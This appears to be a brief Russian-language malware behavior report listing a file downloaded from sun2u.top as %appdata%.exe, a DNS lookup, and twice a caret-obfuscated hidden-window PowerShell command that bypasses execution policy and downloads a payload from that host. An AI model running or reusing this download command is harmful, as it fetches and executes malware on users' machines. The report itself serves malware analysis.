Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^wEr^S^hel^L^.ExE -eXE^cUt^Io^n^P^o^Li^cY By^Pa^S^S -NO^P^Ro^FIL^e^ -w^iN^dO^WSTYLE HIDDe^N (n^EW-^OBject syStem^.ne^t.wEb^c^li^enT)^.do^W^N^LO^a^dfiL^e(^'http://sun2u.top/searc...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /C "po^wEr^S^hel^L^.ExE -eXE^cUt^Io^n^P^o^Li^cY By^Pa^S^S -NO^P^Ro^FIL^e^ -w^iN^dO^WSTYLE HIDDe^N (n^EW-^OBject syStem^.ne^t.wEb^c^li^enT)^.do^W^N^LO^a^dfiL^e(^'http://sun2u.top/searc...' (со скрытым окном)